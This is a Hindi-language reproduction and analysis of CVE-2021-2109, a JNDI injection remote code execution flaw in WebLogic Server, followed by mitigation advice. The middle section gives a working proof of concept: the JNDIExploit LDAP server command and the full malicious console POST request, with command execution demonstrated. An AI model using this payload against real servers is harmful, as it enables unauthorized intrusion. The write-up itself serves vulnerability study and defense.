
CVE-2021-2109 का चरण-दर-चरण पुनरुत्पादन और विश्लेषण, जो JNDI इंजेक्शन के माध्यम से Weblogic Server में एक रिमोट कोड निष्पादन भेद्यता है, साथ ही POC और शमन मार्गदर्शन के साथ।
CVE-2021-2109 Weblogic Server दूरस्थ कोड निष्पादन भेद्यता पुनरुत्पादन एवं विश्लेषण
जनवरी 2021 में Oracle ने सुरक्षा अद्यतन पैच जारी किए, जिनमें Oracle उत्पाद श्रृंखला के 329 नए सुरक्षा पैच शामिल हैं। इस घोषणा में विशेष रूप से 1 नवंबर 2020 को जारी Oracle WebLogic Server के CVE-2020-14750 भेद्यता से संबंधित सुरक्षा घोषणा का उल्लेख किया गया था। ग्राहकों को दृढ़ता से सलाह दी जाती है कि वे इस पैच अद्यतन और इस घोषणा के अन्य पैच लागू करें। CVE संख्या CVE-2021-2109, यह भेद्यता Weblogic की दूरस्थ कोड निष्पादन भेद्यता है। यह भेद्यता मुख्य रूप से JNDI इंजेक्शन के कारण होती है, जिससे हमलावर इस भेद्यता का उपयोग करके दूरस्थ कोड निष्पादन कर सकता है।
प्रभावित संस्करण निम्नलिखित हैं: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0
Weblogic Server परीक्षण वातावरण स्थापित करने के लिए Docker का उपयोग करें, Weblogic Server तक सामान्य रूप से पहुँचा जा सकता है


इस मशीन पर LDAP प्रारंभ करें, इसे https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 से डाउनलोड किया जा सकता है, कमांड निम्नलिखित है: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

Weblogic Server दूरस्थ कोड निष्पादन भेद्यता CVE-2021-2109 का JNDI इंजेक्शन POC पैकेट भेजें: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

cmd चर के माध्यम से ipconfig सिस्टम कमांड निष्पादित करें


cmd चर के माध्यम से calc.exe निष्पादित करें और सिस्टम कैलकुलेटर खोलें


सिस्टम कैलकुलेटर खुल गया

CVE-2021-2109 Weblogic Server दूरस्थ कोड निष्पादन भेद्यता के लिए सुरक्षा सिफारिशें
T3 प्रोटोकॉल अक्षम करें यदि आप JVM संचार के लिए T3 प्रोटोकॉल पर निर्भर नहीं हैं, तो आप T3 प्रोटोकॉल को अस्थायी रूप से अवरुद्ध करके इस भेद्यता के प्रभाव को कम कर सकते हैं। 1). Weblogic कंसोल में प्रवेश करें, base_domain कॉन्फ़िगरेशन पृष्ठ में, "सुरक्षा" टैब पृष्ठ पर जाएँ, "फ़िल्टर" पर क्लिक करें और फ़िल्टर कॉन्फ़िगर करें। 2). कनेक्शन फ़िल्टर में दर्ज करें: weblogic.security.net.ConnectionFilterImpl, कनेक्शन फ़िल्टर नियम बॉक्स में दर्ज करें: * * 7001 deny t3 t3s।
IIOP को सक्षम करना प्रतिबंधित करें Weblogic कंसोल में लॉगिन करें, IIOP सक्षम करने का विकल्प ढूँढें, चयन हटाएँ, और पुनः आरंभ करने के बाद प्रभावी होगा
बैकएंड /console/console.portal की बाहरी पहुँच को अस्थायी रूप से बंद करें
आधिकारिक सुरक्षा पैच अपग्रेड करें